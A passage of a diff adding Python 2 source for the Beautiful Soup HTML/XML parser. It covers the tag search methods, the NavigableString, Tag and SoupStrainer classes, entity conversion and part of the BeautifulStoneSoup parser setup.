+ """Returns the first item that matches the given criteria and
+ appears before this Tag in the document."""
+ return self._findOne(self.findAllPrevious, name, attrs, text, **kwargs)
+
+ def findAllPrevious(self, name=None, attrs={}, text=None, limit=None,
+ **kwargs):
+ """Returns all items that match the given criteria and appear
+ before this Tag in the document."""
+ return self._findAll(name, attrs, text, limit, self.previousGenerator,
+ **kwargs)
+ fetchPrevious = findAllPrevious # Compatibility with pre-3.x
+
+ def findPreviousSibling(self, name=None, attrs={}, text=None, **kwargs):
+ """Returns the closest sibling to this Tag that matches the
+ given criteria and appears before this Tag in the document."""
+ return self._findOne(self.findPreviousSiblings, name, attrs, text,
+ **kwargs)
+
+ def findPreviousSiblings(self, name=None, attrs={}, text=None,
+ limit=None, **kwargs):
+ """Returns the siblings of this Tag that match the given
+ criteria and appear before this Tag in the document."""
+ return self._findAll(name, attrs, text, limit,
+ self.previousSiblingGenerator, **kwargs)
+ fetchPreviousSiblings = findPreviousSiblings # Compatibility with pre-3.x
+
+ def findParent(self, name=None, attrs={}, **kwargs):
+ """Returns the closest parent of this Tag that matches the given
+ criteria."""
+ # NOTE: We can't use _findOne because findParents takes a different
+ # set of arguments.
+ r = None
+ l = self.findParents(name, attrs, 1)
+ if l:
+ r = l[0]
+ return r
+
+ def findParents(self, name=None, attrs={}, limit=None, **kwargs):
+ """Returns the parents of this Tag that match the given
+ criteria."""
+
+ return self._findAll(name, attrs, None, limit, self.parentGenerator,
+ **kwargs)
+ fetchParents = findParents # Compatibility with pre-3.x
+
+ #These methods do the real heavy lifting.
+
+ def _findOne(self, method, name, attrs, text, **kwargs):
+ r = None
+ l = method(name, attrs, text, 1, **kwargs)
+ if l:
+ r = l[0]
+ return r
+
+ def _findAll(self, name, attrs, text, limit, generator, **kwargs):
+ "Iterates over a generator looking for things that match."
+
+ if isinstance(name, SoupStrainer):
+ strainer = name
+ else:
+ # Build a SoupStrainer
+ strainer = SoupStrainer(name, attrs, text, **kwargs)
+ results = ResultSet(strainer)
+ g = generator()
+ while True:
+ try:
+ i = g.next()
+ except StopIteration:
+ break
+ if i:
+ found = strainer.search(i)
+ if found:
+ results.append(found)
+ if limit and len(results) >= limit:
+ break
+ return results
+
+ #These Generators can be used to navigate starting from both
+ #NavigableStrings and Tags.
+ def nextGenerator(self):
+ i = self
+ while i:
+ i = i.next
+ yield i
+
+ def nextSiblingGenerator(self):
+ i = self
+ while i:
+ i = i.nextSibling
+ yield i
+
+ def previousGenerator(self):
+ i = self
+ while i:
+ i = i.previous
+ yield i
+
+ def previousSiblingGenerator(self):
+ i = self
+ while i:
+ i = i.previousSibling
+ yield i
+
+ def parentGenerator(self):
+ i = self
+ while i:
+ i = i.parent
+ yield i
+
+ # Utility methods
+ def substituteEncoding(self, str, encoding=None):
+ encoding = encoding or "utf-8"
+ return str.replace("%SOUP-ENCODING%", encoding)
+
+ def toEncoding(self, s, encoding=None):
+ """Encodes an object to a string in some encoding, or to Unicode.
+ ."""
+ if isinstance(s, unicode):
+ if encoding:
+ s = s.encode(encoding)
+ elif isinstance(s, str):
+ if encoding:
+ s = s.encode(encoding)
+ else:
+ s = unicode(s)
+ else:
+ if encoding:
+ s = self.toEncoding(str(s), encoding)
+ else:
+ s = unicode(s)
+ return s
+
+class NavigableString(unicode, PageElement):
+
+ def __new__(cls, value):
+ """Create a new NavigableString.
+
+ When unpickling a NavigableString, this method is called with
+ the string in DEFAULT_OUTPUT_ENCODING. That encoding needs to be
+ passed in to the superclass's __new__ or the superclass won't know
+ how to handle non-ASCII characters.
+ """
+ if isinstance(value, unicode):
+ return unicode.__new__(cls, value)
+ return unicode.__new__(cls, value, DEFAULT_OUTPUT_ENCODING)
+
+ def __getnewargs__(self):
+ return (unicode(self),)
+
+ def __getattr__(self, attr):
+ """text.string gives you text. This is for backwards
+ compatibility for Navigable*String, but for CData* it lets you
+ get the string without the CData wrapper."""
+ if attr == 'string':
+ return self
+ else:
+ raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__.__name__, attr)
+
+ def encode(self, encoding=DEFAULT_OUTPUT_ENCODING):
+ return self.decode().encode(encoding)
+
+ def decodeGivenEventualEncoding(self, eventualEncoding):
+ return self
+
+class CData(NavigableString):
+
+ def decodeGivenEventualEncoding(self, eventualEncoding):
+ return u'<![CDATA[' + self + u']]>'
+
+class ProcessingInstruction(NavigableString):
+
+ def decodeGivenEventualEncoding(self, eventualEncoding):
+ output = self
+ if u'%SOUP-ENCODING%' in output:
+ output = self.substituteEncoding(output, eventualEncoding)
+ return u'<?' + output + u'?>'
+
+class Comment(NavigableString):
+ def decodeGivenEventualEncoding(self, eventualEncoding):
+ return u'<!--' + self + u'-->'
+
+class Declaration(NavigableString):
+ def decodeGivenEventualEncoding(self, eventualEncoding):
+ return u'<!' + self + u'>'
+
+class Tag(PageElement):
+
+ """Represents a found HTML tag with its attributes and contents."""
+
+ def _invert(h):
+ "Cheap function to invert a hash."
+ i = {}
+ for k,v in h.items():
+ i[v] = k
+ return i
+
+ XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'",
+ "quot" : '"',
+ "amp" : "&",
+ "lt" : "<",
+ "gt" : ">" }
+
+ XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS)
+
+ def _convertEntities(self, match):
+ """Used in a call to re.sub to replace HTML, XML, and numeric
+ entities with the appropriate Unicode characters. If HTML
+ entities are being converted, any unrecognized entities are
+ escaped."""
+ x = match.group(1)
+ if self.convertHTMLEntities and x in name2codepoint:
+ return unichr(name2codepoint[x])
+ elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS:
+ if self.convertXMLEntities:
+ return self.XML_ENTITIES_TO_SPECIAL_CHARS[x]
+ else:
+ return u'&%s;' % x
+ elif len(x) > 0 and x[0] == '#':
+ # Handle numeric entities
+ if len(x) > 1 and x[1] == 'x':
+ return unichr(int(x[2:], 16))
+ else:
+ return unichr(int(x[1:]))
+
+ elif self.escapeUnrecognizedEntities:
+ return u'&amp;%s;' % x
+ else:
+ return u'&%s;' % x
+
+ def __init__(self, parser, name, attrs=None, parent=None,
+ previous=None):
+ "Basic constructor."
+
+ # We don't actually store the parser object: that lets extracted
+ # chunks be garbage-collected
+ self.parserClass = parser.__class__
+ self.isSelfClosing = parser.isSelfClosingTag(name)
+ self.name = name
+ if attrs == None:
+ attrs = []
+ self.attrs = attrs
+ self.contents = []
+ self.setup(parent, previous)
+ self.hidden = False
+ self.containsSubstitutions = False
+ self.convertHTMLEntities = parser.convertHTMLEntities
+ self.convertXMLEntities = parser.convertXMLEntities
+ self.escapeUnrecognizedEntities = parser.escapeUnrecognizedEntities
+
+ def convert(kval):
+ "Converts HTML, XML and numeric entities in the attribute value."
+ k, val = kval
+ if val is None:
+ return kval
+ return (k, re.sub("&(#\d+|#x[0-9a-fA-F]+|\w+);",
+ self._convertEntities, val))
+ self.attrs = map(convert, self.attrs)
+
+ def get(self, key, default=None):
+ """Returns the value of the 'key' attribute for the tag, or
+ the value given for 'default' if it doesn't have that
+ attribute."""
+ return self._getAttrMap().get(key, default)
+
+ def has_key(self, key):
+ return self._getAttrMap().has_key(key)
+
+ def __getitem__(self, key):
+ """tag[key] returns the value of the 'key' attribute for the tag,
+ and throws an exception if it's not there."""
+ return self._getAttrMap()[key]
+
+ def __iter__(self):
+ "Iterating over a tag iterates over its contents."
+ return iter(self.contents)
+
+ def __len__(self):
+ "The length of a tag is the length of its list of contents."
+ return len(self.contents)
+
+ def __contains__(self, x):
+ return x in self.contents
+
+ def __nonzero__(self):
+ "A tag is non-None even if it has no contents."
+ return True
+
+ def __setitem__(self, key, value):
+ """Setting tag[key] sets the value of the 'key' attribute for the
+ tag."""
+ self._getAttrMap()
+ self.attrMap[key] = value
+ found = False
+ for i in range(0, len(self.attrs)):
+ if self.attrs[i][0] == key:
+ self.attrs[i] = (key, value)
+ found = True
+ if not found:
+ self.attrs.append((key, value))
+ self._getAttrMap()[key] = value
+
+ def __delitem__(self, key):
+ "Deleting tag[key] deletes all 'key' attributes for the tag."
+ for item in self.attrs:
+ if item[0] == key:
+ self.attrs.remove(item)
+ #We don't break because bad HTML can define the same
+ #attribute multiple times.
+ self._getAttrMap()
+ if self.attrMap.has_key(key):
+ del self.attrMap[key]
+
+ def __call__(self, *args, **kwargs):
+ """Calling a tag like a function is the same as calling its
+ findAll() method. Eg. tag('a') returns a list of all the A tags
+ found within this tag."""
+ return apply(self.findAll, args, kwargs)
+
+ def __getattr__(self, tag):
+ #print "Getattr %s.%s" % (self.__class__, tag)
+ if len(tag) > 3 and tag.rfind('Tag') == len(tag)-3:
+ return self.find(tag[:-3])
+ elif tag.find('__') != 0:
+ return self.find(tag)
+ raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__, tag)
+
+ def __eq__(self, other):
+ """Returns true iff this tag has the same name, the same attributes,
+ and the same contents (recursively) as the given tag.
+
+ NOTE: right now this will return false if two tags have the
+ same attributes in a different order. Should this be fixed?"""
+ if not hasattr(other, 'name') or not hasattr(other, 'attrs') or not hasattr(other, 'contents') or self.name != other.name or self.attrs != other.attrs or len(self) != len(other):
+ return False
+ for i in range(0, len(self.contents)):
+ if self.contents[i] != other.contents[i]:
+ return False
+ return True
+
+ def __ne__(self, other):
+ """Returns true iff this tag is not identical to the other tag,
+ as defined in __eq__."""
+ return not self == other
+
+ def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING):
+ """Renders this tag as a string."""
+ return self.decode(eventualEncoding=encoding)
+
+ BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|"
+ + "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)"
+ + ")")
+
+ def _sub_entity(self, x):
+ """Used with a regular expression to substitute the
+ appropriate XML entity for an XML special character."""
+ return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";"
+
+ def __unicode__(self):
+ return self.decode()
+
+ def __str__(self):
+ return self.encode()
+
+ def encode(self, encoding=DEFAULT_OUTPUT_ENCODING,
+ prettyPrint=False, indentLevel=0):
+ return self.decode(prettyPrint, indentLevel, encoding).encode(encoding)
+
+ def decode(self, prettyPrint=False, indentLevel=0,
+ eventualEncoding=DEFAULT_OUTPUT_ENCODING):
+ """Returns a string or Unicode representation of this tag and
+ its contents. To get Unicode, pass None for encoding."""
+
+ attrs = []
+ if self.attrs:
+ for key, val in self.attrs:
+ fmt = '%s="%s"'
+ if isString(val):
+ if (self.containsSubstitutions
+ and eventualEncoding is not None
+ and '%SOUP-ENCODING%' in val):
+ val = self.substituteEncoding(val, eventualEncoding)
+
+ # The attribute value either:
+ #
+ # * Contains no embedded double quotes or single quotes.
+ # No problem: we enclose it in double quotes.
+ # * Contains embedded single quotes. No problem:
+ # double quotes work here too.
+ # * Contains embedded double quotes. No problem:
+ # we enclose it in single quotes.
+ # * Embeds both single _and_ double quotes. This
+ # can't happen naturally, but it can happen if
+ # you modify an attribute value after parsing
+ # the document. Now we have a bit of a
+ # problem. We solve it by enclosing the
+ # attribute in single quotes, and escaping any
+ # embedded single quotes to XML entities.
+ if '"' in val:
+ fmt = "%s='%s'"
+ if "'" in val:
+ # TODO: replace with apos when
+ # appropriate.
+ val = val.replace("'", "&squot;")
+
+ # Now we're okay w/r/t quotes. But the attribute
+ # value might also contain angle brackets, or
+ # ampersands that aren't part of entities. We need
+ # to escape those to XML entities too.
+ val = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, val)
+ if val is None:
+ # Handle boolean attributes.
+ decoded = key
+ else:
+ decoded = fmt % (key, val)
+ attrs.append(decoded)
+ close = ''
+ closeTag = ''
+ if self.isSelfClosing:
+ close = ' /'
+ else:
+ closeTag = '</%s>' % self.name
+
+ indentTag, indentContents = 0, 0
+ if prettyPrint:
+ indentTag = indentLevel
+ space = (' ' * (indentTag-1))
+ indentContents = indentTag + 1
+ contents = self.decodeContents(prettyPrint, indentContents,
+ eventualEncoding)
+ if self.hidden:
+ s = contents
+ else:
+ s = []
+ attributeString = ''
+ if attrs:
+ attributeString = ' ' + ' '.join(attrs)
+ if prettyPrint:
+ s.append(space)
+ s.append('<%s%s%s>' % (self.name, attributeString, close))
+ if prettyPrint:
+ s.append("\n")
+ s.append(contents)
+ if prettyPrint and contents and contents[-1] != "\n":
+ s.append("\n")
+ if prettyPrint and closeTag:
+ s.append(space)
+ s.append(closeTag)
+ if prettyPrint and closeTag and self.nextSibling:
+ s.append("\n")
+ s = ''.join(s)
+ return s
+
+ def decompose(self):
+ """Recursively destroys the contents of this tree."""
+ contents = [i for i in self.contents]
+ for i in contents:
+ if isinstance(i, Tag):
+ i.decompose()
+ else:
+ i.extract()
+ self.extract()
+
+ def prettify(self, encoding=DEFAULT_OUTPUT_ENCODING):
+ return self.encode(encoding, True)
+
+ def encodeContents(self, encoding=DEFAULT_OUTPUT_ENCODING,
+ prettyPrint=False, indentLevel=0):
+ return self.decodeContents(prettyPrint, indentLevel).encode(encoding)
+
+ def decodeContents(self, prettyPrint=False, indentLevel=0,
+ eventualEncoding=DEFAULT_OUTPUT_ENCODING):
+ """Renders the contents of this tag as a string in the given
+ encoding. If encoding is None, returns a Unicode string.."""
+ s=[]
+ for c in self:
+ text = None
+ if isinstance(c, NavigableString):
+ text = c.decodeGivenEventualEncoding(eventualEncoding)
+ elif isinstance(c, Tag):
+ s.append(c.decode(prettyPrint, indentLevel, eventualEncoding))
+ if text and prettyPrint:
+ text = text.strip()
+ if text:
+ if prettyPrint:
+ s.append(" " * (indentLevel-1))
+ s.append(text)
+ if prettyPrint:
+ s.append("\n")
+ return ''.join(s)
+
+ #Soup methods
+
+ def find(self, name=None, attrs={}, recursive=True, text=None,
+ **kwargs):
+ """Return only the first child of this Tag matching the given
+ criteria."""
+ r = None
+ l = self.findAll(name, attrs, recursive, text, 1, **kwargs)
+ if l:
+ r = l[0]
+ return r
+ findChild = find
+
+ def findAll(self, name=None, attrs={}, recursive=True, text=None,
+ limit=None, **kwargs):
+ """Extracts a list of Tag objects that match the given
+ criteria. You can specify the name of the Tag and any
+ attributes you want the Tag to have.
+
+ The value of a key-value pair in the 'attrs' map can be a
+ string, a list of strings, a regular expression object, or a
+ callable that takes a string and returns whether or not the
+ string matches for some custom definition of 'matches'. The
+ same is true of the tag name."""
+ generator = self.recursiveChildGenerator
+ if not recursive:
+ generator = self.childGenerator
+ return self._findAll(name, attrs, text, limit, generator, **kwargs)
+ findChildren = findAll
+
+ # Pre-3.x compatibility methods. Will go away in 4.0.
+ first = find
+ fetch = findAll
+
+ def fetchText(self, text=None, recursive=True, limit=None):
+ return self.findAll(text=text, recursive=recursive, limit=limit)
+
+ def firstText(self, text=None, recursive=True):
+ return self.find(text=text, recursive=recursive)
+
+ # 3.x compatibility methods. Will go away in 4.0.
+ def renderContents(self, encoding=DEFAULT_OUTPUT_ENCODING,
+ prettyPrint=False, indentLevel=0):
+ if encoding is None:
+ return self.decodeContents(prettyPrint, indentLevel, encoding)
+ else:
+ return self.encodeContents(encoding, prettyPrint, indentLevel)
+
+
+ #Private methods
+
+ def _getAttrMap(self):
+ """Initializes a map representation of this tag's attributes,
+ if not already initialized."""
+ if not getattr(self, 'attrMap'):
+ self.attrMap = {}
+ for (key, value) in self.attrs:
+ self.attrMap[key] = value
+ return self.attrMap
+
+ #Generator methods
+ def recursiveChildGenerator(self):
+ if not len(self.contents):
+ raise StopIteration
+ stopNode = self._lastRecursiveChild().next
+ current = self.contents[0]
+ while current is not stopNode:
+ yield current
+ current = current.next
+
+ def childGenerator(self):
+ if not len(self.contents):
+ raise StopIteration
+ current = self.contents[0]
+ while current:
+ yield current
+ current = current.nextSibling
+ raise StopIteration
+
+# Next, a couple classes to represent queries and their results.
+class SoupStrainer:
+ """Encapsulates a number of ways of matching a markup element (tag or
+ text)."""
+
+ def __init__(self, name=None, attrs={}, text=None, **kwargs):
+ self.name = name
+ if isString(attrs):
+ kwargs['class'] = attrs
+ attrs = None
+ if kwargs:
+ if attrs:
+ attrs = attrs.copy()
+ attrs.update(kwargs)
+ else:
+ attrs = kwargs
+ self.attrs = attrs
+ self.text = text
+
+ def __str__(self):
+ if self.text:
+ return self.text
+ else:
+ return "%s|%s" % (self.name, self.attrs)
+
+ def searchTag(self, markupName=None, markupAttrs={}):
+ found = None
+ markup = None
+ if isinstance(markupName, Tag):
+ markup = markupName
+ markupAttrs = markup
+ callFunctionWithTagData = callable(self.name) \
+ and not isinstance(markupName, Tag)
+
+ if (not self.name) \
+ or callFunctionWithTagData \
+ or (markup and self._matches(markup, self.name)) \
+ or (not markup and self._matches(markupName, self.name)):
+ if callFunctionWithTagData:
+ match = self.name(markupName, markupAttrs)
+ else:
+ match = True
+ markupAttrMap = None
+ for attr, matchAgainst in self.attrs.items():
+ if not markupAttrMap:
+ if hasattr(markupAttrs, 'get'):
+ markupAttrMap = markupAttrs
+ else:
+ markupAttrMap = {}
+ for k,v in markupAttrs:
+ markupAttrMap[k] = v
+ attrValue = markupAttrMap.get(attr)
+ if not self._matches(attrValue, matchAgainst):
+ match = False
+ break
+ if match:
+ if markup:
+ found = markup
+ else:
+ found = markupName
+ return found
+
+ def search(self, markup):
+ #print 'looking for %s in %s' % (self, markup)
+ found = None
+ # If given a list of items, scan it for a text element that
+ # matches.
+ if isList(markup) and not isinstance(markup, Tag):
+ for element in markup:
+ if isinstance(element, NavigableString) \
+ and self.search(element):
+ found = element
+ break
+ # If it's a Tag, make sure its name or attributes match.
+ # Don't bother with Tags if we're searching for text.
+ elif isinstance(markup, Tag):
+ if not self.text:
+ found = self.searchTag(markup)
+ # If it's text, make sure the text matches.
+ elif isinstance(markup, NavigableString) or \
+ isString(markup):
+ if self._matches(markup, self.text):
+ found = markup
+ else:
+ raise Exception, "I don't know how to match against a %s" \
+ % markup.__class__
+ return found
+
+ def _matches(self, markup, matchAgainst):
+ #print "Matching %s against %s" % (markup, matchAgainst)
+ result = False
+ if matchAgainst == True and type(matchAgainst) == types.BooleanType:
+ result = markup != None
+ elif callable(matchAgainst):
+ result = matchAgainst(markup)
+ else:
+ #Custom match methods take the tag as an argument, but all
+ #other ways of matching match the tag name as a string.
+ if isinstance(markup, Tag):
+ markup = markup.name
+ if markup is not None and not isString(markup):
+ markup = unicode(markup)
+ #Now we know that chunk is either a string, or None.
+ if hasattr(matchAgainst, 'match'):
+ # It's a regexp object.
+ result = markup and matchAgainst.search(markup)
+ elif (isList(matchAgainst)
+ and (markup is not None or not isString(matchAgainst))):
+ result = markup in matchAgainst
+ elif hasattr(matchAgainst, 'items'):
+ result = markup.has_key(matchAgainst)
+ elif matchAgainst and isString(markup):
+ if isinstance(markup, unicode):
+ matchAgainst = unicode(matchAgainst)
+ else:
+ matchAgainst = str(matchAgainst)
+
+ if not result:
+ result = matchAgainst == markup
+ return result
+
+class ResultSet(list):
+ """A ResultSet is just a list that keeps track of the SoupStrainer
+ that created it."""
+ def __init__(self, source):
+ list.__init__([])
+ self.source = source
+
+# Now, some helper functions.
+
+def isList(l):
+ """Convenience method that works with all 2.x versions of Python
+ to determine whether or not something is listlike."""
+ return ((hasattr(l, '__iter__') and not isString(l))
+ or (type(l) in (types.ListType, types.TupleType)))
+
+def isString(s):
+ """Convenience method that works with all 2.x versions of Python
+ to determine whether or not something is stringlike."""
+ try:
+ return isinstance(s, unicode) or isinstance(s, basestring)
+ except NameError:
+ return isinstance(s, str)
+
+def buildTagMap(default, *args):
+ """Turns a list of maps, lists, or scalars into a single map.
+ Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and
+ NESTING_RESET_TAGS maps out of lists and partial maps."""
+ built = {}
+ for portion in args:
+ if hasattr(portion, 'items'):
+ #It's a map. Merge it.
+ for k,v in portion.items():
+ built[k] = v
+ elif isList(portion) and not isString(portion):
+ #It's a list. Map each item to the default.
+ for k in portion:
+ built[k] = default
+ else:
+ #It's a scalar. Map it to the default.
+ built[portion] = default
+ return built
+
+# Now, the parser classes.
+
+class HTMLParserBuilder(HTMLParser):
+
+ def __init__(self, soup):
+ HTMLParser.__init__(self)
+ self.soup = soup
+
+ # We inherit feed() and reset().
+
+ def handle_starttag(self, name, attrs):
+ if name == 'meta':
+ self.soup.extractCharsetFromMeta(attrs)
+ else:
+ self.soup.unknown_starttag(name, attrs)
+
+ def handle_endtag(self, name):
+ self.soup.unknown_endtag(name)
+
+ def handle_data(self, content):
+ self.soup.handle_data(content)
+
+ def _toStringSubclass(self, text, subclass):
+ """Adds a certain piece of text to the tree as a NavigableString
+ subclass."""
+ self.soup.endData()
+ self.handle_data(text)
+ self.soup.endData(subclass)
+
+ def handle_pi(self, text):
+ """Handle a processing instruction as a ProcessingInstruction
+ object, possibly one with a %SOUP-ENCODING% slot into which an
+ encoding will be plugged later."""
+ if text[:3] == "xml":
+ text = u"xml version='1.0' encoding='%SOUP-ENCODING%'"
+ self._toStringSubclass(text, ProcessingInstruction)
+
+ def handle_comment(self, text):
+ "Handle comments as Comment objects."
+ self._toStringSubclass(text, Comment)
+
+ def handle_charref(self, ref):
+ "Handle character references as data."
+ if self.soup.convertEntities:
+ data = unichr(int(ref))
+ else:
+ data = '&#%s;' % ref
+ self.handle_data(data)
+
+ def handle_entityref(self, ref):
+ """Handle entity references as data, possibly converting known
+ HTML and/or XML entity references to the corresponding Unicode
+ characters."""
+ data = None
+ if self.soup.convertHTMLEntities:
+ try:
+ data = unichr(name2codepoint[ref])
+ except KeyError:
+ pass
+
+ if not data and self.soup.convertXMLEntities:
+ data = self.soup.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref)
+
+ if not data and self.soup.convertHTMLEntities and \
+ not self.soup.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref):
+ # TODO: We've got a problem here. We're told this is
+ # an entity reference, but it's not an XML entity
+ # reference or an HTML entity reference. Nonetheless,
+ # the logical thing to do is to pass it through as an
+ # unrecognized entity reference.
+ #
+ # Except: when the input is "&carol;" this function
+ # will be called with input "carol". When the input is
+ # "AT&T", this function will be called with input
+ # "T". We have no way of knowing whether a semicolon
+ # was present originally, so we don't know whether
+ # this is an unknown entity or just a misplaced
+ # ampersand.
+ #
+ # The more common case is a misplaced ampersand, so I
+ # escape the ampersand and omit the trailing semicolon.
+ data = "&amp;%s" % ref
+ if not data:
+ # This case is different from the one above, because we
+ # haven't already gone through a supposedly comprehensive
+ # mapping of entities to Unicode characters. We might not
+ # have gone through any mapping at all. So the chances are
+ # very high that this is a real entity, and not a
+ # misplaced ampersand.
+ data = "&%s;" % ref
+ self.handle_data(data)
+
+ def handle_decl(self, data):
+ "Handle DOCTYPEs and the like as Declaration objects."
+ self._toStringSubclass(data, Declaration)
+
+ def parse_declaration(self, i):
+ """Treat a bogus SGML declaration as raw data. Treat a CDATA
+ declaration as a CData object."""
+ j = None
+ if self.rawdata[i:i+9] == '<![CDATA[':
+ k = self.rawdata.find(']]>', i)
+ if k == -1:
+ k = len(self.rawdata)
+ data = self.rawdata[i+9:k]
+ j = k+3
+ self._toStringSubclass(data, CData)
+ else:
+ try:
+ j = HTMLParser.parse_declaration(self, i)
+ except HTMLParseError:
+ toHandle = self.rawdata[i:]
+ self.handle_data(toHandle)
+ j = i + len(toHandle)
+ return j
+
+
+class BeautifulStoneSoup(Tag):
+
+ """This class contains the basic parser and search code. It defines
+ a parser that knows nothing about tag behavior except for the
+ following:
+
+ You can't close a tag without closing all the tags it encloses.
+ That is, "<foo><bar></foo>" actually means
+ "<foo><bar></bar></foo>".
+
+ [Another possible explanation is "<foo><bar /></foo>", but since
+ this class defines no SELF_CLOSING_TAGS, it will never use that
+ explanation.]
+
+ This class is useful for parsing XML or made-up markup languages,
+ or when BeautifulSoup makes an assumption counter to what you were
+ expecting."""
+
+ SELF_CLOSING_TAGS = {}
+ NESTABLE_TAGS = {}
+ RESET_NESTING_TAGS = {}
+ QUOTE_TAGS = {}
+ PRESERVE_WHITESPACE_TAGS = []
+
+ MARKUP_MASSAGE = [(re.compile('(<[^<>]*)/>'),
+ lambda x: x.group(1) + ' />'),
+ (re.compile('<!\s+([^<>]*)>'),
+ lambda x: '<!' + x.group(1) + '>')
+ ]
+
+ ROOT_TAG_NAME = u'[document]'
+
+ HTML_ENTITIES = "html"
+ XML_ENTITIES = "xml"
+ XHTML_ENTITIES = "xhtml"
+ # TODO: This only exists for backwards-compatibility
+ ALL_ENTITIES = XHTML_ENTITIES
+
+ # Used when determining whether a text node is all whitespace and
+ # can be replaced with a single space. A text node that contains
+ # fancy Unicode spaces (usually non-breaking) should be left
+ # alone.
+ STRIP_ASCII_SPACES = { 9: None, 10: None, 12: None, 13: None, 32: None, }
+
+ def __init__(self, markup="", parseOnlyThese=None, fromEncoding=None,
+ markupMassage=True, smartQuotesTo=XML_ENTITIES,
+ convertEntities=None, selfClosingTags=None, isHTML=False,
+ builder=HTMLParserBuilder):
+ """The Soup object is initialized as the 'root tag', and the
+ provided markup (which can be a string or a file-like object)
+ is fed into the underlying parser.
+
+ HTMLParser will process most bad HTML, and the BeautifulSoup
+ class has some tricks for dealing with some HTML that kills
+ HTMLParser, but Beautiful Soup can nonetheless choke or lose data
+ if your data uses self-closing tags or declarations
+ incorrectly.
+
+ By default, Beautiful Soup uses regexes to sanitize input,
+ avoiding the vast majority of these problems. If the problems
+ don't apply to you, pass in False for markupMassage, and
+ you'll get better performance.
+
+ The default parser massage techniques fix the two most common
+ instances of invalid HTML that choke HTMLParser:
+
+ <br/> (No space between name of closing tag and tag close)
+ <! --Comment--> (Extraneous whitespace in declaration)
+
+ You can pass in a custom list of (RE object, replace method)
+ tuples to get Beautiful Soup to scrub your input the way you
+ want."""
+
+ self.parseOnlyThese = parseOnlyThese
+ self.fromEncoding = fromEncoding
+ self.smartQuotesTo = smartQuotesTo
+ self.convertEntities = convertEntities
+ # Set the rules for how we'll deal with the entities we
+ # encounter
+ if self.convertEntities:
+ # It doesn't make sense to convert encoded characters to
+ # entities even while you're converting entities to Unicode.
+ # Just convert it all to Unicode.
+ self.smartQuotesTo = None
+ if convertEntities == self.HTML_ENTITIES:
+ self.convertXMLEntities = False
+ self.convertHTMLEntities = True
+ self.escapeUnrecognizedEntities = True
+ elif convertEntities == self.XHTML_ENTITIES:
+ self.convertXMLEntities = True
+ self.convertHTMLEntities = True
+ self.escapeUnrecognizedEntities = False
+ elif convertEntities == self.XML_ENTITIES:
+ self.convertXMLEntities = True
+ self.convertHTMLEntities = False
+ self.escapeUnrecognizedEntities = False
+ else:
+ self.convertXMLEntities = False
+ self.convertHTMLEntities = False
+ self.escapeUnrecognizedEntities = False
+
+ self.instanceSelfClosingTags = buildTagMap(None, selfClosingTags)
+ self.builder = builder(self)
+ self.reset()
+
+ if hasattr(markup, 'read'): # It's a file-type object.
+ markup = markup.read()
+ self.markup = markup
+ self.markupMassage = markupMassage
+ try:
+ self._feed(isHTML=isHTML)
+ except StopParsing:
+ pass
+ self.markup = None # The markup can now be GCed.
+ self.builder = None # So can the builder.
+
+ def _feed(self, inDocumentEncoding=None, isHTML=False):
+ # Convert the document to Unicode.
+ markup = self.markup
+ if isinstance(markup, unicode):
+ if not hasattr(self, 'originalEncoding'):
+ self.originalEncoding = None
+ else:
+ dammit = UnicodeDammit\
+ (markup, [self.fromEncoding, inDocumentEncoding],
+ smartQuotesTo=self.smartQuotesTo, isHTML=isHTML)
+ markup = dammit.unicode
+ self.originalEncoding = dammit.originalEncoding
+ self.declaredHTMLEncoding = dammit.declaredHTMLEncoding
+ if markup:
+ if self.markupMassage:
+ if not isList(self.markupMassage):
+ self.markupMassage = self.MARKUP_MASSAGE
+ for fix, m in self.markupMassage:
+ markup = fix.sub(m, markup)
+ # TODO: We get rid of markupMassage so that the
+ # soup object can be deepcopied later on. Some
+ # Python installations can't copy regexes. If anyone
+ # was relying on the existence of markupMassage, this
+ # might cause problems.
+ del(self.markupMassage)
+ self.builder.reset()
+
+ self.builder.feed(markup)
+ # Close out any unfinished strings and close all the open tags.
+ self.endData()
+ while self.currentTag.name != self.ROOT_TAG_NAME:
+ self.popTag()
+
+ def isSelfClosingTag(self, name):
+ """Returns true iff the given string is the name of a
+ self-closing tag according to this parser."""
+ return self.SELF_CLOSING_TAGS.has_key(name) \
+ or self.instanceSelfClosingTags.has_key(name)
+
+ def reset(self):
+ Tag.__init__(self, self, self.ROOT_TAG_NAME)
+ self.hidden = 1
+ self.builder.reset()
+ self.currentData = []
+ self.currentTag = None
+ self.tagStack = []
+ self.quoteStack = []
+ self.pushTag(self)
+
+ def popTag(self):
+ tag = self.tagStack.pop()
+ # Tags with just one string-owning child get the child as a
+ # 'string' property, so that soup.tag.string is shorthand for
+ # soup.tag.contents[0]
+ if len(self.currentTag.contents) == 1 and \
+ isinstance(self.currentTag.contents[0], NavigableString):
+ self.currentTag.string = self.currentTag.contents[0]
+
+ #print "Pop", tag.name
+ if self.tagStack:
+ self.currentTag = self.tagStack[-1]
+ return self.currentTag
+
+ def pushTag(self, tag):
+ #print "Push", tag.name
+ if self.currentTag:
+ self.currentTag.contents.append(tag)
+ self.tagStack.append(tag)
+ self.currentTag = self.tagStack[-1]
+
+ def endData(self, containerClass=NavigableString):
+ if self.currentData:
+ currentData = u''.join(self.currentData)
+ if (currentData.translate(self.STRIP_ASCII_SPACES) == '' and
+ not set([tag.name for tag in self.tagStack]).intersection(
+ self.PRESERVE_WHITESPACE_TAGS)):
+ if '\n' in currentData:
+ currentData = '\n'
+ else:
+ currentData = ' '
+ self.currentData = []
+ if self.parseOnlyThese and len(self.tagStack) <= 1 and \
+ (not self.parseOnlyThese.text or \
+ not self.parseOnlyThese.search(currentData)):
+ return
+ o = containerClass(currentData)
+ o.setup(self.currentTag, self.previous)
+ if self.previous:
+ self.previous.next = o
+ self.previous = o
